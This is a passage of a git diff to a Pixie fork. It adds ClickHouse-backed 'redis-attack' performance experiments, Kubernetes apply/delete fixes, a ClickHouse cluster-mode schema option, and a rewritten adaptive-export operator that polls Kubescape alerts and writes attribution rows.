SIGSEGV if DNS fails (see ClickHouseExportSinkNode TODO). + // - exportDSN: /default — where Pixie's CH export sink writes. + // - alertsDSN: /forensic_db — where Vector lands Kubescape alerts. + // forensic_db must be pre-created via soc/tree/clickhouse-lab/schema.sql; + // this suite does not bootstrap CH schemas (CH is shared infra). + // + // SOC_CH_HOST / SOC_CH_CREDS override the defaults for local-cluster runs + // where the forensic CH is in the same k3s as the experiment workloads + // (perf_tool's local-ci.sh phase 9 sets these to a NodePort + the local + // `pixie` user it creates). + clickhouseHost := os.Getenv("SOC_CH_HOST") + if clickhouseHost == "" { + clickhouseHost = "clickhouse.forensic.austrianopencloudcommunity.org:9000" + } + clickhouseCreds := os.Getenv("SOC_CH_CREDS") + if clickhouseCreds == "" { + clickhouseCreds = "pixie:pixie_password" + } + exportDSN := fmt.Sprintf("%s@%s/default", clickhouseCreds, clickhouseHost) + alertsDSN := fmt.Sprintf("%s@%s/forensic_db", clickhouseCreds, clickhouseHost) + exportTable := "redis_events" + // Vector writes raw kubescape alerts to forensic_db.kubescape_logs (see + // helm-rendered/vector-values.yaml kubescape_clickhouse sink). A + // separate forensic_db.alerts materialized view / projection exists in + // some demo variants but is not populated by the stock Vector config. + alertsTable := "kubescape_logs" + + // Load sweep. The MultiTierAppWorkload's k6 loadgen scales linearly + // with the multiplier: 1× = 500 QPS, 32× = 16 000 QPS hitting the API + // (which fans out to redis + postgres at correlated rates). Run a + // single multiplier via `--experiment_name=redis-attack-x`, or + // run them all sequentially to characterize Pixie + CH + adaptive + // operator headroom across the sweep. + // + // Range starts at 2× because the 1×–16× sweep on 2026-05-14 showed + // PEM peaking at only ~400 % CPU and CH at 1.5 GB / 16 GB — the + // 32-core / 64 GB VM was nowhere near the knee. 64× ≈ 32 k QPS + // stretches the loadgen → API → redis + postgres → Pixie path + // hard enough to either saturate something or expose the next + // bottleneck (currently suspect: redis-server's single-thread + // 1-CPU limit, gunicorn worker count, or k6 self-throttling). + loadMultipliers := []int{2, 4, 8, 16, 32, 64} + exps := map[string]*pb.ExperimentSpec{} + for _, m := range loadMultipliers { + name := fmt.Sprintf("redis-attack-%dx", m) + exps[name] = SovereignSOCRedisAttackExperiment( + defaultMetricPeriod, + exportPeriod, exportWindow, + exportDSN, exportTable, + alertsDSN, alertsTable, + alertCountWindow, + preDur, dur, + m, + ) + } + for _, e := range exps { + addTags(e, "suite/sovereign-soc") + } + return exps +} diff --git a/src/e2e_test/perf_tool/pkg/suites/workloads.go b/src/e2e_test/perf_tool/pkg/suites/workloads.go index e0679e5cfb8..dd91bc02715 100644 --- a/src/e2e_test/perf_tool/pkg/suites/workloads.go +++ b/src/e2e_test/perf_tool/pkg/suites/workloads.go @@ -30,6 +30,32 @@ import ( pb "px.dev/pixie/src/e2e_test/perf_tool/experimentpb" ) +// VizierReleaseWorkload returns the workload spec to deploy a released version of Vizier via `px deploy`. +// This skips the skaffold build step, using pre-built images from the Pixie release. +func VizierReleaseWorkload() *pb.WorkloadSpec { + return &pb.WorkloadSpec{ + Name: "vizier", + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Px{ + Px: &pb.PxCLIDeploy{ + Args: []string{ + "deploy", + }, + SetClusterID: true, + Namespaces: []string{ + "pl", + "px-operator", + "olm", + }, + }, + }, + }, + }, + Healthchecks: VizierHealthChecks(), + } +} + // VizierWorkload returns the workload spec to deploy Vizier. func VizierWorkload() *pb.WorkloadSpec { return &pb.WorkloadSpec{ @@ -189,6 +215,36 @@ func OnlineBoutiqueWorkload() *pb.WorkloadSpec { } } +// ClickHouseReadLoadWorkload deploys the (future) skaffold application that +// generates sustained ClickHouse read traffic alongside the Pixie read +// experiment. The skaffold path below is a placeholder; wire up the real +// application once it exists in the tree. +func ClickHouseReadLoadWorkload() *pb.WorkloadSpec { + return &pb.WorkloadSpec{ + Name: "clickhouse-read-load", + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Skaffold{ + Skaffold: &pb.SkaffoldDeploy{ + // TODO(ddelnano): replace with the real skaffold path once + // the ClickHouse read-load generator app lands. + SkaffoldPath: "src/e2e_test/clickhouse_read_load/skaffold.yaml", + }, + }, + }, + }, + Healthchecks: []*pb.HealthCheck{ + { + CheckType: &pb.HealthCheck_K8S{ + K8S: &pb.K8SPodsReadyCheck{ + Namespace: "px-clickhouse-read-load", + }, + }, + }, + }, + } +} + // KafkaWorkload returns the WorkloadSpec to deploy the kafka demo. func KafkaWorkload() *pb.WorkloadSpec { return &pb.WorkloadSpec{ diff --git a/src/e2e_test/perf_tool/ui/index.html b/src/e2e_test/perf_tool/ui/index.html new file mode 100644 index 00000000000..e57432b207e --- /dev/null +++ b/src/e2e_test/perf_tool/ui/index.html @@ -0,0 +1,1215 @@ + + + + + + Pixie Perf Tool Dashboard + + + + +
+

Pixie Perf Tool Dashboard

+ DuckDB WASM + Parquet +
+ +
Initializing DuckDB...
+ +
+ +
+

Data Source

+
+
+
+

Drop parquet files here or click to browse

+

results_*.parquet and spec.parquet files

+ +
+
+
OR
+
+
+ + + + + + + +

+ Bucket must be publicly readable or have CORS configured. +

+
+
+
+
+
+ + + +
+ + + + diff --git a/src/e2e_test/protocol_loadtest/skaffold_client.yaml b/src/e2e_test/protocol_loadtest/skaffold_client.yaml index 3939defe219..a85de725773 100644 --- a/src/e2e_test/protocol_loadtest/skaffold_client.yaml +++ b/src/e2e_test/protocol_loadtest/skaffold_client.yaml @@ -7,6 +7,8 @@ build: context: . bazel: target: //src/e2e_test/protocol_loadtest/client:protocol_loadtest_client_image.tar + args: + - --config=x86_64_sysroot tagPolicy: dateTime: {} local: diff --git a/src/e2e_test/protocol_loadtest/skaffold_loadtest.yaml b/src/e2e_test/protocol_loadtest/skaffold_loadtest.yaml index f6d25ba9ed6..87b38a59ee1 100644 --- a/src/e2e_test/protocol_loadtest/skaffold_loadtest.yaml +++ b/src/e2e_test/protocol_loadtest/skaffold_loadtest.yaml @@ -7,6 +7,8 @@ build: context: . bazel: target: //src/e2e_test/protocol_loadtest:protocol_loadtest_server_image.tar + args: + - --config=x86_64_sysroot tagPolicy: dateTime: {} local: diff --git a/src/utils/shared/k8s/apply.go b/src/utils/shared/k8s/apply.go index c25858ce6d7..0a5e4100dea 100644 --- a/src/utils/shared/k8s/apply.go +++ b/src/utils/shared/k8s/apply.go @@ -30,6 +30,7 @@ import ( "strings" log "github.com/sirupsen/logrus" + "k8s.io/apimachinery/pkg/api/meta" k8serrors "k8s.io/apimachinery/pkg/api/errors" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" "k8s.io/apimachinery/pkg/apis/meta/v1/unstructured" @@ -235,8 +236,15 @@ func ApplyResources(clientset kubernetes.Interface, config *rest.Config, resourc } nsRes := res.Namespace(objNS) + // Use the rest mapping's scope to decide between cluster- and + // namespace-scoped client paths. The previous implementation kept a + // hardcoded allowlist of cluster-scoped kinds and tried to namespace- + // qualify everything else, which produced "the server could not find + // the requested resource" 404s for any cluster-scoped resource not + // in the list (e.g. APIService, PriorityClass, or cluster-scoped CRs + // like RuntimeRuleAlertBinding). createRes := nsRes - if k8sRes == "validatingwebhookconfigurations" || k8sRes == "mutatingwebhookconfigurations" || k8sRes == "namespaces" || k8sRes == "configmap" || k8sRes == "clusterrolebindings" || k8sRes == "clusterroles" || k8sRes == "customresourcedefinitions" { + if mapping.Scope != nil && mapping.Scope.Name() == meta.RESTScopeNameRoot { createRes = res } diff --git a/src/utils/shared/k8s/delete.go b/src/utils/shared/k8s/delete.go index 3adb2c8b986..689e0f8be54 100644 --- a/src/utils/shared/k8s/delete.go +++ b/src/utils/shared/k8s/delete.go @@ -29,7 +29,9 @@ import ( "k8s.io/apimachinery/pkg/api/errors" "k8s.io/apimachinery/pkg/api/meta" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" + "k8s.io/apimachinery/pkg/apis/meta/v1/unstructured" "k8s.io/apimachinery/pkg/runtime" + "k8s.io/apimachinery/pkg/runtime/schema" "k8s.io/apimachinery/pkg/util/sets" "k8s.io/cli-runtime/pkg/genericclioptions" "k8s.io/cli-runtime/pkg/printers" @@ -44,6 +46,12 @@ import ( cmdwait "k8s.io/kubectl/pkg/cmd/wait" ) +var apiServiceGVR = schema.GroupVersionResource{ + Group: "apiregistration.k8s.io", + Version: "v1", + Resource: "apiservices", +} + // ObjectDeleter has methods to delete K8s objects and wait for them. This code is adopted from `kubectl delete`. type ObjectDeleter struct { Namespace string @@ -110,6 +118,32 @@ func (o *ObjectDeleter) DeleteNamespace() error { return err } +// getAggregatedGroupVersions returns the set of group/versions that are served +// by an aggregated APIService (spec.service is non-nil). Resources in those +// groups are skipped during cluster-wide deletion sweeps because aggregated +// servers frequently advertise the delete verb on read-only virtual resources +// and fail the call with "operation not supported". +func (o *ObjectDeleter) getAggregatedGroupVersions() (sets.String, error) { + out := sets.NewString() + list, err := o.dynamicClient.Resource(apiServiceGVR).List(context.TODO(), metav1.ListOptions{}) + if err != nil { + if errors.IsNotFound(err) || meta.IsNoMatchError(err) { + return out, nil + } + return nil, err + } + for _, item := range list.Items { + svc, found, err := unstructured.NestedMap(item.Object, "spec", "service") + if err != nil || !found || svc == nil { + continue + } + group, _, _ := unstructured.NestedString(item.Object, "spec", "group") + version, _, _ := unstructured.NestedString(item.Object, "spec", "version") + out.Insert(schema.GroupVersion{Group: group, Version: version}.String()) + } + return out, nil +} + func (o *ObjectDeleter) getDeletableResourceTypes() ([]string, error) { discoveryClient, err := o.rcg.ToDiscoveryClient() if err != nil { @@ -121,11 +155,19 @@ func (o *ObjectDeleter) getDeletableResourceTypes() ([]string, error) { return nil, err } + aggregated, err := o.getAggregatedGroupVersions() + if err != nil { + return nil, err + } + resources := []string{} for _, list := range lists { if len(list.APIResources) == 0 { continue } + if aggregated.Has(list.GroupVersion) { + continue + } for _, resource := range list.APIResources { if len(resource.Verbs) == 0 { @@ -145,6 +187,9 @@ func (o *ObjectDeleter) DeleteByLabel(selector string, resourceKinds ...string) if err := o.initRestClientGetter(); err != nil { return 0, err } + if err := o.initDynamicClient(); err != nil { + return 0, err + } b := resource.NewBuilder(o.rcg) if len(resourceKinds) == 0 { @@ -169,9 +214,6 @@ func (o *ObjectDeleter) DeleteByLabel(selector string, resourceKinds ...string) if err != nil { return 0, err } - if err := o.initDynamicClient(); err != nil { - return 0, err - } return o.runDelete(r) } diff --git a/src/vizier/funcs/md_udtfs/md_udtfs_impl.h b/src/vizier/funcs/md_udtfs/md_udtfs_impl.h index ff5fdcbe6c2..9b1d9936df3 100644 --- a/src/vizier/funcs/md_udtfs/md_udtfs_impl.h +++ b/src/vizier/funcs/md_udtfs/md_udtfs_impl.h @@ -1145,12 +1145,17 @@ class CreateClickHouseSchemas final : public carnot::udf::UDTF("database", "ClickHouse database", "'default'"), UDTFArg::Make( - "use_if_not_exists", "Whether to use IF NOT EXISTS in CREATE TABLE statements", true)); + "use_if_not_exists", "Whether to use IF NOT EXISTS in CREATE TABLE statements", true), + UDTFArg::Make( + "cluster_name", + "ClickHouse cluster name for ON CLUSTER DDL and ReplicatedMergeTree engine. " + "Empty string disables cluster mode.", + "''")); } Status Init(FunctionContext*, types::StringValue host, types::Int64Value port, types::StringValue username, types::StringValue password, types::StringValue database, - types::BoolValue use_if_not_exists) { + types::BoolValue use_if_not_exists, types::StringValue cluster_name) { // Store ClickHouse connection parameters host_ = std::string(host); port_ = port.val; @@ -1158,6 +1163,7 @@ class CreateClickHouseSchemas final : public carnot::udf::UDTFExecute(absl::Substitute("DROP TABLE IF EXISTS $0", table_name)); + std::string drop_cluster_clause = + cluster_name_.empty() ? "" : absl::Substitute(" ON CLUSTER '$0'", cluster_name_); + clickhouse_client_->Execute( + absl::Substitute("DROP TABLE IF EXISTS $0$1", table_name, drop_cluster_clause)); } // Create new table @@ -1276,7 +1286,8 @@ class CreateClickHouseSchemas final : public carnot::udf::UDTF column_defs; // Add columns from schema @@ -1301,14 +1312,21 @@ class CreateClickHouseSchemas final : public carnot::udf::UDTF= 22.x). + std::string engine = cluster_name.empty() ? "MergeTree()" : "ReplicatedMergeTree()"; std::string create_sql = absl::Substitute(R"( - CREATE TABLE $0$1 ( - $2 - ) ENGINE = MergeTree() + CREATE TABLE $0$1$2 ( + $3 + ) ENGINE = $4 PARTITION BY toYYYYMM(event_time) ORDER BY (hostname, event_time) )", - if_not_exists_clause, table_name, columns_str); + if_not_exists_clause, table_name, on_cluster_clause, + columns_str, engine); return create_sql; } @@ -1326,6 +1344,7 @@ class CreateClickHouseSchemas final : public carnot::udf::UDTF +// - start the trigger + controller +// +// 2. steady state: +// - trigger polls forensic_db.kubescape_logs WHERE hostname= +// - controller derives anomaly hash from each event and writes a +// forensic_db.adaptive_attribution row (one INSERT per event; +// ReplacingMergeTree(t_end) collapses re-inserts to the latest +// end_time, extending the active window) +// +// 3. shutdown: +// - on SIGINT/SIGTERM, cancel context, drain. package main import ( @@ -21,276 +42,445 @@ import ( "fmt" "os" "os/signal" + "strconv" + "strings" + "sync" "syscall" "time" log "github.com/sirupsen/logrus" - "px.dev/pixie/src/api/go/pxapi" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" "px.dev/pixie/src/vizier/services/adaptive_export/internal/config" + "px.dev/pixie/src/api/go/pxapi" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller" "px.dev/pixie/src/vizier/services/adaptive_export/internal/pixie" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/pixieapi" "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl" "px.dev/pixie/src/vizier/services/adaptive_export/internal/script" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger" ) const ( - defaultRetries = 100 - defaultSleepTime = 15 * time.Second - schemaCreationInterval = 2 * time.Minute - setupTimeout = 30 * time.Second - scriptExecutionTimeout = 60 * time.Second -) - -const ( - // TODO(ddelnano): Clickhouse configuration should come from plugin config. - schemaCreationScript = ` -import px -px.display(px.CreateClickHouseSchemas( - host="hyperdx-hdx-oss-v2-clickhouse.click.svc.cluster.local", - port=9000, - username="otelcollector", - password="otelcollectorpass", - database="default" -)) -` - detectionScript = ` -import px - -df = px.DataFrame('kubescape_logs', clickhouse_dsn='otelcollector:otelcollectorpass@hyperdx-hdx-oss-v2-clickhouse.click.svc.cluster.local:9000/default', start_time='-%ds') -df.alert = df.message -df.namespace = px.pluck(df.RuntimeK8sDetails, "podNamespace") -df.podName = px.pluck(df.RuntimeK8sDetails, "podName") -df.time_ = px.int64_to_time(df.event_time * 1000000000) -df = df[['time_', 'alert', 'namespace', 'podName']] -px.display(df) -` + // envCHHTTPEndpoint overrides the ClickHouse HTTP endpoint used by + // both the trigger (poll kubescape_logs) and the sink (write + // adaptive_attribution). Defaults to http://:8123. + envCHHTTPEndpoint = "FORENSIC_CH_HTTP_ENDPOINT" + + // envNodeName is the k8s downward API var the DaemonSet sets via + // `valueFrom: fieldRef: spec.nodeName`. Falls back to os.Hostname(). + envNodeName = "NODE_NAME" + + // envWindowBeforeSec / envWindowAfterSec / envTriggerPollMS / + // envPruneIntervalSec are programmatic overrides per the spec. + envWindowBeforeSec = "ADAPTIVE_WINDOW_BEFORE_SEC" + envWindowAfterSec = "ADAPTIVE_WINDOW_AFTER_SEC" + envTriggerPollMS = "ADAPTIVE_TRIGGER_POLL_MS" + envPruneIntervalSec = "ADAPTIVE_PRUNE_INTERVAL_SEC" + + // envSkipApply lets a deployment opt out of in-process DDL when + // the schema has been pre-applied by a separate Job (recommended + // production split: high-priv Job for CREATE TABLE / ALTER, then + // the operator runs with INSERT-only creds and skips Apply). + // VerifyPixieSchema still runs and refuses to start on drift. + envSkipApply = "ADAPTIVE_SKIP_APPLY" + + // envInstallPresets makes the operator boot install Pixie's preset + // retention scripts on this cluster. One-shot, idempotent (script-name + // match → skip). Defaults to false because the production design has + // users author scripts in the Pixie UI. + envInstallPresets = "INSTALL_PRESET_SCRIPTS" + + // envPushPixieTables — when true, the operator queries vizier + // directly via pxapi on each fresh anomaly and writes the resulting + // rows to forensic_db. (rev-1 path). Required when the + // cloud's retention plugin can't reach the in-cluster CH (e.g. + // AOCC pixie cloud + CH ClusterIP service). + envPushPixieTables = "ADAPTIVE_PUSH_PIXIE_ROWS" ) func main() { ctx, cancel := context.WithCancel(context.Background()) defer cancel() - log.Info("Starting the ClickHouse Adaptive Export service") + log.Info("starting adaptive-export operator (push flow, rev 2)") cfg, err := config.GetConfig() if err != nil { log.WithError(err).Fatal("failed to load configuration") } - clusterId := cfg.Pixie().ClusterID() - clusterName := cfg.Worker().ClusterName() - - // Setup Pixie Plugin API client - log.Infof("Setting up Pixie plugin API client for cluster-id %s", clusterId) - pluginClient, err := setupPixie(ctx, cfg.Pixie(), defaultRetries, defaultSleepTime) + hostname, err := resolveHostname() if err != nil { - log.WithError(err).Fatal("setting up Pixie plugin client failed") + log.WithError(err).Fatal("failed to resolve node identity — set NODE_NAME via k8s downward API (spec.nodeName)") } + log.WithField("hostname", hostname).Info("operator pod is node-local") + + chEndpoint := chHTTPEndpoint(cfg.ClickHouse().Host(), os.Getenv(envCHHTTPEndpoint)) + log.WithField("endpoint", chEndpoint).Info("clickhouse HTTP endpoint resolved") - // Setup Pixie pxapi client for executing PxL scripts - log.Info("Setting up Pixie pxapi client") - // Use parent context - client stores this and uses it for all subsequent operations - pxClient, err := pxapi.NewClient(ctx, pxapi.WithAPIKey(cfg.Pixie().APIKey()), pxapi.WithCloudAddr(cfg.Pixie().Host())) + // 1. Apply operator-owned DDL FIRST, before Pixie's retention plugin + // has a chance to auto-create pixie tables with its minimal + // column set (no namespace / pod). The kubescape tables + // (alerts, kubescape_logs) are owned by the soc installer and + // are NOT touched here. + applier, err := clickhouse.NewApplier(chEndpoint, cfg.ClickHouse().User(), cfg.ClickHouse().Password()) if err != nil { - log.WithError(err).Fatal("failed to create pxapi client") + log.WithError(err).Fatal("failed to construct schema applier") + } + if strings.EqualFold(os.Getenv(envSkipApply), "true") { + log.Info("ADAPTIVE_SKIP_APPLY=true — schema apply skipped; expecting an out-of-band DDL Job to have created the tables") + } else { + if err := applier.Apply(ctx); err != nil { + log.WithError(err).Fatal("schema apply failed; refusing to proceed with possibly drifted tables") + } + log.WithField("tables", clickhouse.OperatorOwnedTables).Info("operator-owned DDL applied") } - // Start schema creation background task - go runSchemaCreationTask(ctx, pxClient, clusterId) - - // Start detection script that monitors for when to enable persistence - go runDetectionTask(ctx, pxClient, pluginClient, cfg, clusterId, clusterName) - - // Wait for signal to shutdown - sigCh := make(chan os.Signal, 1) - signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM) - <-sigCh - - log.Info("Shutting down adaptive export service") - cancel() - time.Sleep(1 * time.Second) -} - -func runSchemaCreationTask(ctx context.Context, client *pxapi.Client, clusterID string) { - ticker := time.NewTicker(schemaCreationInterval) - defer ticker.Stop() + // 2. Defensive guard against Pixie's retention plugin having + // auto-created any pixie table BEFORE our Apply ran (e.g. a + // pre-existing cluster install). Refuse to start if drift + // detected so the misconfig is loud, not silent. + if err := applier.VerifyPixieSchema(ctx); err != nil { + log.WithError(err).Fatal("pixie table schema drift detected — pre-existing tables are missing operator-required columns; drop and re-create OR ALTER TABLE ADD COLUMN before retrying") + } + log.Info("pixie table schemas verified — namespace + pod columns present on all 12 tables") - // Run immediately on startup - log.Info("Running schema creation script") - execCtx, cancel := context.WithTimeout(ctx, scriptExecutionTimeout) - if _, err := pxl.ExecuteScript(execCtx, client, clusterID, schemaCreationScript); err != nil { - log.WithError(err).Error("failed to execute schema creation script") + // 3. Ensure the Pixie ClickHouse retention plugin is enabled. The + // retention scripts themselves are defined by the user via the + // Pixie UI — we don't manage them. + pluginClient, err := pixie.NewClient(ctx, cfg.Pixie().APIKey(), cfg.Pixie().Host()) + if err != nil { + log.WithError(err).Fatal("failed to create pixie plugin client") + } + chDSN := cfg.ClickHouse().DSN() + exportURL, err := pluginClient.EnsureClickHousePluginEnabled(chDSN) + if err != nil { + // non-fatal — the operator's own write path doesn't depend on + // the plugin; analyst joins against pixie-table rows do, but a + // missing plugin is a deployment misconfiguration the user + // surfaces via UI. + log.WithError(err).Warn("could not ensure ClickHouse plugin is enabled — pixie tables will not be populated until you turn it on in the Pixie UI") } else { - log.Info("Schema creation script completed successfully") + log.WithField("export_url", exportURL).Info("clickhouse retention plugin is enabled") } - cancel() - for { - select { - case <-ctx.Done(): - log.Info("Schema creation task shutting down") - return - case <-ticker.C: - log.Info("Running schema creation script") - execCtx, cancel := context.WithTimeout(ctx, scriptExecutionTimeout) - if _, err := pxl.ExecuteScript(execCtx, client, clusterID, schemaCreationScript); err != nil { - log.WithError(err).Error("failed to execute schema creation script") - } else { - log.Info("Schema creation script completed successfully") - } - cancel() + // 3b. (optional) install Pixie's preset retention scripts so the + // pixie observation tables actually receive rows. Without this, + // the plugin is enabled but does nothing. + if strings.EqualFold(os.Getenv(envInstallPresets), "true") { + installed, err := installPresetScripts(pluginClient, cfg.Pixie().ClusterID(), cfg.Worker().ClusterName()) + if err != nil { + log.WithError(err).Warn("INSTALL_PRESET_SCRIPTS=true but install failed — pixie tables will stay empty") + } else { + log.WithField("installed", installed).Info("preset retention scripts installed on cluster") } } -} - -func runDetectionTask(ctx context.Context, pxClient *pxapi.Client, pluginClient *pixie.Client, cfg config.Config, clusterID string, clusterName string) { - detectionInterval := time.Duration(cfg.Worker().DetectionInterval()) * time.Second - detectionLookback := cfg.Worker().DetectionLookback() - - ticker := time.NewTicker(detectionInterval) - defer ticker.Stop() - pluginEnabled := false + // 4. Build trigger + sink + controller. + pollInterval := durEnv(envTriggerPollMS, 250*time.Millisecond, time.Millisecond) + trg, err := trigger.New(trigger.Config{ + Endpoint: chEndpoint, + Database: cfg.ClickHouse().Database(), + Table: cfg.ClickHouse().Table(), + Username: cfg.ClickHouse().User(), + Password: cfg.ClickHouse().Password(), + Hostname: hostname, + PollInterval: pollInterval, + }) + if err != nil { + log.WithError(err).Fatal("failed to create trigger") + } - for { - select { - case <-ctx.Done(): - log.Info("Detection task shutting down") - return - case <-ticker.C: - log.Info("Running detection script") - // Run detection script with lookback period - detectionPxl := fmt.Sprintf(detectionScript, detectionLookback) - execCtx, cancel := context.WithTimeout(ctx, scriptExecutionTimeout) - recordCount, err := pxl.ExecuteScript(execCtx, pxClient, clusterID, detectionPxl) - cancel() + snk, err := sink.New(sink.Config{ + Endpoint: chEndpoint, + Database: cfg.ClickHouse().Database(), + Username: cfg.ClickHouse().User(), + Password: cfg.ClickHouse().Password(), + }) + if err != nil { + log.WithError(err).Fatal("failed to create sink") + } - if err != nil { - log.WithError(err).Error("failed to execute detection script") + ctlCfg := controller.Config{ + Hostname: hostname, + Before: durEnv(envWindowBeforeSec, 5*time.Minute, time.Second), + After: durEnv(envWindowAfterSec, 5*time.Minute, time.Second), + } + if strings.EqualFold(os.Getenv(envPushPixieTables), "true") { + // PxL's px.DataFrame(table=…) rejects dotted table names even + // though px.GetSchemas() lists them. Drop them from the push + // list; the cloud-side retention plugin would have to handle + // those if the user wants them. + var tables []string + for _, t := range pxl.Names(pxl.BuiltinTables) { + if strings.Contains(t, ".") { + log.WithField("table", t).Info("skipping dotted-name table from push list — PxL DataFrame rejects it") continue } - - log.Debugf("Detection script returned %d records", recordCount) - - // If we have records and plugin is not enabled, enable it - if recordCount > 0 && !pluginEnabled { - log.Info("Detection script returned records - enabling forensic export") - pluginCtx, pluginCancel := context.WithTimeout(ctx, 2*time.Minute) - if err := enableClickHousePlugin(pluginCtx, pluginClient, cfg, clusterID, clusterName); err != nil { - log.WithError(err).Error("failed to enable forensic export") - } else { - pluginEnabled = true - log.Info("Forensic export enabled successfully") - } - pluginCancel() - } else if recordCount > 0 && pluginEnabled { - log.Info("Detection script returned records but forensic export already enabled, no action taken") + tables = append(tables, t) + } + ctlCfg.PushPixieTables = tables + log.WithField("tables", ctlCfg.PushPixieTables). + Info("ADAPTIVE_PUSH_PIXIE_ROWS=true — operator will query pixie + write rows directly on each anomaly") + } + ctl := controller.New(trg, snk, ctlCfg, nil) + if len(ctlCfg.PushPixieTables) > 0 { + var adapter *pixieapi.Adapter + if direct := os.Getenv("ADAPTIVE_VIZIER_DIRECT_ADDR"); direct != "" { + // Direct mode — bypass the cloud's passthrough proxy and + // connect to the in-cluster vizier-query-broker. Use this + // on self-hosted clouds where pxapi.WithAPIKey isn't + // authorized for the cluster (e.g. a freshly-deployed + // vizier whose ID isn't yet linked to the API key's owner). + a, err := pixieapi.NewDirectFromEnv(cfg.Pixie().ClusterID()) + if err != nil { + log.WithError(err).Fatal("ADAPTIVE_VIZIER_DIRECT_ADDR set but direct-mode adapter init failed") } + log.WithField("addr", direct).Info("pixieapi: direct mode (bypassing cloud proxy)") + adapter = a + } else { + pxClient, err := pxapi.NewClient(ctx, + pxapi.WithAPIKey(cfg.Pixie().APIKey()), + pxapi.WithCloudAddr(cfg.Pixie().Host())) + if err != nil { + log.WithError(err).Fatal("ADAPTIVE_PUSH_PIXIE_ROWS=true but failed to create pxapi client") + } + adapter = pixieapi.New(pxClient, cfg.Pixie().ClusterID()) } + ctl = ctl.WithPixieQuerier(&pixieAdapter{a: adapter}) } -} -func enableClickHousePlugin(ctx context.Context, client *pixie.Client, cfg config.Config, clusterID string, clusterName string) error { - log.Info("Checking the current ClickHouse plugin configuration") - plugin, err := client.GetClickHousePlugin() - if err != nil { - return fmt.Errorf("getting data retention plugins failed: %w", err) + // 5. Rehydrate active state across crashes. + if err := ctl.Rehydrate(ctx); err != nil { + log.WithError(err).Warn("could not rehydrate active set; starting cold") + } else { + log.WithField("active", ctl.Active()).Info("active set rehydrated") } - enablePlugin := true - if plugin.RetentionEnabled { - enablePlugin = false - config, err := client.GetClickHousePluginConfig() - if err != nil { - return fmt.Errorf("getting ClickHouse plugin config failed: %w", err) + // 6. Periodic prune of in-memory expired entries + main controller loop. + // Both goroutines are tracked in a WaitGroup so SIGTERM cleanly waits + // for in-flight HTTP calls (trigger 5s timeout, sink 30s timeout) + // instead of being cut off by an arbitrary 500ms sleep. + pruneInterval := durEnv(envPruneIntervalSec, 30*time.Second, time.Second) + var wg sync.WaitGroup + wg.Add(1) + go func() { + defer wg.Done() + t := time.NewTicker(pruneInterval) + defer t.Stop() + for { + select { + case <-ctx.Done(): + return + case <-t.C: + if removed := ctl.PruneExpired(); removed > 0 { + log.WithField("removed", removed).Debug("pruned expired active entries") + } + } } - if config.ExportUrl != cfg.ClickHouse().DSN() { - log.Info("ClickHouse plugin is configured with different DSN... Overwriting") - enablePlugin = true + }() + + // 7. Run the controller. + wg.Add(1) + go func() { + defer wg.Done() + if err := ctl.Run(ctx); err != nil && err != context.Canceled { + log.WithError(err).Error("controller exited with error") } + }() + + log.WithFields(log.Fields{ + "hostname": hostname, + "poll_interval": pollInterval, + "prune_interval": pruneInterval, + "window_before": ctlCfg.Before, + "window_after": ctlCfg.After, + }).Info("operator running") + + sigCh := make(chan os.Signal, 1) + signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM) + <-sigCh + log.Info("shutdown signal received; waiting for goroutines to drain") + cancel() + // Bound the wait so a hung HTTP call can't keep the process up forever. + done := make(chan struct{}) + go func() { wg.Wait(); close(done) }() + select { + case <-done: + log.Info("clean shutdown") + case <-time.After(35 * time.Second): + log.Warn("shutdown deadline reached with goroutines still running; exiting") } +} - if enablePlugin { - log.Info("Enabling ClickHouse plugin") - err := client.EnableClickHousePlugin(&pixie.ClickHousePluginConfig{ - ExportUrl: cfg.ClickHouse().DSN(), - }, plugin.LatestVersion) - if err != nil { - return fmt.Errorf("failed to enable ClickHouse plugin: %w", err) - } +// chHTTPEndpoint resolves the ClickHouse HTTP endpoint. Explicit env +// override wins; otherwise build "http://:8123" from config. +func chHTTPEndpoint(host, override string) string { + if override != "" { + return strings.TrimRight(override, "/") + } + if host == "" { + host = "localhost" } + return "http://" + host + ":8123" +} - log.Info("Setting up the data retention scripts") +// resolveHostname picks the node identity for node-local scoping. +// REQUIRES NODE_NAME (set via k8s downward API spec.nodeName). The +// previous os.Hostname() fallback returned the POD hostname, not the +// node — making the operator silently miss its node's rows. +func resolveHostname() (string, error) { + if v := strings.TrimSpace(os.Getenv(envNodeName)); v != "" { + return v, nil + } + return "", fmt.Errorf("%s env var is required (set via k8s downward API: valueFrom.fieldRef.fieldPath=spec.nodeName)", envNodeName) +} - log.Info("Getting preset script from the Pixie plugin") - defsFromPixie, err := client.GetPresetScripts() +// durEnv reads a positive-integer-valued duration env var. unit +// defines the unit (time.Second, time.Millisecond). Returns dflt on +// missing / unparseable / non-positive values — non-positive would +// either panic time.NewTicker or invert the attribution window, so +// we fall back to the default and log loudly. +func durEnv(key string, dflt, unit time.Duration) time.Duration { + v := strings.TrimSpace(os.Getenv(key)) + if v == "" { + return dflt + } + n, err := strconv.ParseInt(v, 10, 64) if err != nil { - return fmt.Errorf("failed to get preset scripts: %w", err) + log.WithError(err).WithFields(log.Fields{"key": key, "value": v}). + Warn("invalid duration env; using default") + return dflt } + if n <= 0 { + log.WithFields(log.Fields{"key": key, "value": v}). + Warn("non-positive duration env; using default") + return dflt + } + return time.Duration(n) * unit +} - definitions := defsFromPixie +// pixieAdapter wraps pixieapi.Adapter so its return type matches the +// controller's PixieQuerier interface (which uses []map[string]any +// rather than the pixieapi-internal Row alias). +type pixieAdapter struct{ a *pixieapi.Adapter } - log.Infof("Getting current scripts for cluster") - currentScripts, err := client.GetClusterScripts(clusterID, clusterName) +func (p *pixieAdapter) Query(ctx context.Context, src string) ([]map[string]any, error) { + rows, err := p.a.Query(ctx, src) if err != nil { - return fmt.Errorf("failed to get data retention scripts: %w", err) + return nil, err } - - 